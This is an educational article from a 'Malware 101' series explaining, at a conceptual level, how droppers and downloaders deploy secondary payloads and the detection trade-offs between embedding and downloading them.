Malware 101: Additional payloads

If you've ever read annual malware reports, you've probably noticed that Trojan is usually identified as the most common threat. However, as we established earlier, Trojan is simply an infection method and doesn't describe the actual functionality and objectives of the malware. While many Trojans do contain specific objectives functionality, such as deploying bots or stealing information, often a Trojan fully lives up to its namesake by simply deploying the actual attack in the form of additional payloads.

In the context of malware, a payload is a piece of malware that is put onto a system by another piece malware, or possibly a user in the case of implants. When deployed by a Trojan it would be considered a secondary payload because it is the second malware used as part of the attack, but additional payloads can be deployed further along the attack as well.

How droppers and downloaders work

Aside from implants where the process is manual, there are two methods in which additional payloads can be automatically deployed by other malware such as Trojans or bots. They can either be embedded in the malware deploying them or downloaded from the internet.

When the payload is embedded in another malware — which typically only happens with Trojans — it is generally referred to as a dropper. The dropper will convert the embedded payload into its runnable form if necessary and then execute it on the system. The conversion process is sometimes necessary due to the payload being encoded to conform to specific standards, such as with PDFs where embedded files may be compressed and/or encoded into an ASCII representation. Conversion might also be to account for evasion techniques to disguise the embedded payload to avoid detection by antimalware solutions.

Downloaders — as the name implies — download the additional payload to be deployed rather than it having to be embedded in the primary payload. There is a third term often used as well — Loader — but this term does not have a particularly standardized usage, so for some antimalware vendors it might refer to a dropper and for others a downloader. Referring to the specific documentation of the solution using loader and even dropper is often helpful if a distinction is needed. There is even a small number of vendors that refer to embedded files as loaders and downloaded files as droppers, which adds to the confusion.

How droppers and downloaders avoid detection

Embedding payloads versus downloading them has varying trade-offs from the perspective of an attacker trying to evading detection. Embedding a payload doesn't create additional network traffic, and the potential for the payload to be detected and/or blocked by firewalls or other security solutions that analyze network traffic for malware is lower. It does, however, both increase the size of the initial malware as well as expose the additional payload to security software sooner for potential analysis. In some contexts, the mere existence of an embedded file might be enough to trigger extra analysis steps on antimalware solutions.

Downloading additional payloads, on the other hand, keeps both the file size and instructions to be executed more compact. It can also allow for any information gained about a system or network to be considered when serving the additional payload, which allows for different payloads to be deployed based on this information. It is not uncommon for legitimate files to download remote files, so this action alone may not be enough to raise suspicion. But, the payload itself is exposed to any network-based security as well.

In both cases, the logic that executes the payload or loads it into a process is far more difficult to hide unless the file type is expected to have this sort of behavior, such as masquerading as an installer. Both types of deployment also have the advantage that, since the additional payload is decoupled from the first, the authoring and maintaining of both can also be separate. Namely, an attacker can write or utilize existing droppers or downloaders separately from the payloads, which also can either be written by the attacker or an existing malware can be used instead.

Continuing evolution of attacks

With the rise in the market for malware as a service — which has become especially popular with ransomware — and tools that allow for configuring and customizing malware, an attacker doesn't require any knowledge of how to write malware in order to launch a campaign. Malware authors also don't have to rely on launching campaigns because it is possible to monetize their work as a product or service instead, allowing more specialization and separation of efforts in all aspects of malware attacks.

Given the logic required to prepare and execute additional payloads is relatively simple compared to other objectives, it is also much simpler to utilize a wider variety of file types to handle this logic. Scripts or file types that can contain scripts can handle this sort of logic, whereas more complex operating system interactions will often require executable files or at least more robust scripting languages that may not be supported by default on some operating systems.

Microsoft Office files and PDFs are commonly used as downloaders or droppers as a result, in addition to executable files. This offers further flexibility on how an attack or campaign can be carried out, as well as some additional possibilities for evading detection. The simplicity and flexibility that droppers and downloaders afford an attacker have both led to widespread use as well as created additional challenges for security solutions to have to adapt too in order to detect these sorts of threats.

You can read the rest of the Malware 101 series here.